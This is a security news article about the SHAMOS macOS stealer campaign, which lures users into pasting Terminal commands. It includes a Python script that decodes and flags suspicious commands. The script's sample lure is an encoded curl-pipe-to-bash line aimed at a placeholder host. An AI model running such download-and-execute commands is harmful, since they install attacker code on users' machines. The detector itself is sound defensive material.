One Simple Copy-Paste in Terminal Can Hack Your Mac!

CrowdStrike has issued an alert about an ongoing campaign by COOKIE SPIDER. Over 300 macOS users have already fallen victim: attackers use fake ads and support websites to induce victims to run malicious scripts that bypass Gatekeeper.

A Campaign Specifically Targeting macOS

Between June and August 2025, CrowdStrike monitored a series of attacks deploying SHAMOS, a variant of the Atomic macOS Stealer (AMOS), an information stealer. Distributed under a “malware-as-a-service” model, SHAMOS enables cybercriminals to harvest credentials, sensitive data, and cryptocurrencies.

Victims are lured by online advertisements or fake macOS support sites, which prompt them to copy and paste a Terminal command. The result: more than 300 confirmed cases globally, including in France.

How Does the Attack Work?

The scenario is alarmingly simple:

  • The user searches for a solution to a macOS issue (for example, “clear DNS cache”).
  • They click on a well-ranked fraudulent site, promoted through malvertising.
  • They are prompted to copy-paste a Terminal command. This command, sometimes hidden in Base64, downloads a script that captures the user’s password and installs SHAMOS. The malware bypasses Gatekeeper, collects data (passwords, notes, browser cookies, crypto wallets) and even deploys additional malicious payloads, like a fake Ledger Live.

As a reminder, malvertising is a blend of “malicious” and “advertising”: a tactic used by cybercriminals to spread their attacks via online ads.

How to Protect Yourself?

A simple piece of advice: never run a Terminal script that you don’t understand. If the code contains encoded or obscure strings, that’s a red flag. This tactic is similar to the deceptive TikTok tutorials that trick users into copying and pasting incomprehensible lines.
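To make the "encoded or obscure strings" red flag concrete, here is an added example (not code from CrowdStrike or from this article) that inspects a pasted command without running it: it unwraps nested Base64 and reports download-and-execute patterns. The rule patterns, function names and both sample commands are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Heuristics for the lure the article describes. These patterns are
# assumptions made for this example, not CrowdStrike detection signatures.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
RULES = {
    "downloads remote content": re.compile(r"\b(curl|wget)\b"),
    "pipes data into a shell interpreter": re.compile(r"\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "decodes Base64 at run time": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
}

def decode_layers(text, max_depth=3):
    """Return (depth, text) for every readable Base64 blob, following nesting."""
    layers, frontier = [], [(0, text)]
    while frontier:
        depth, current = frontier.pop()
        if depth >= max_depth:
            continue
        for token in B64_TOKEN.findall(current):
            try:
                decoded = base64.b64decode(token, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not Base64 text, e.g. a long path or identifier
            if all(ch.isprintable() or ch in "\n\t" for ch in decoded):
                layers.append((depth + 1, decoded))
                frontier.append((depth + 1, decoded))
    return layers

def triage(command):
    """List red flags in a pasted command. The command is never executed."""
    findings = []
    for depth, text in [(0, command)] + decode_layers(command):
        where = "pasted text" if depth == 0 else f"Base64 layer {depth}"
        if depth:
            findings.append(f"{where}: hidden command -> {text.strip()}")
        findings += [f"{where}: {label}" for label, rx in RULES.items() if rx.search(text)]
    return findings

# Constructed samples: a placeholder lure (example.invalid never resolves)
# and the genuine DNS-cache flush a user might actually be looking for.
INNER = "curl -fsSL https://example.invalid/fix.sh | bash"
LURE = f'echo "{base64.b64encode(INNER.encode()).decode()}" | base64 -d | bash'
BENIGN = "sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder"

if __name__ == "__main__":
    for sample in (LURE, BENIGN):
        print(sample, *(triage(sample) or ["no red flags matched"]), sep="\n  ")
```

An empty result only means none of these few rules matched; it is not proof that a command is safe.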

To prevent disasters, installing security software on your Mac is essential: it blocks malware like SHAMOS, restricts access to compromised sites, and detects phishing attempts. This layer of protection can make a significant difference before your data or cryptocurrencies vanish.
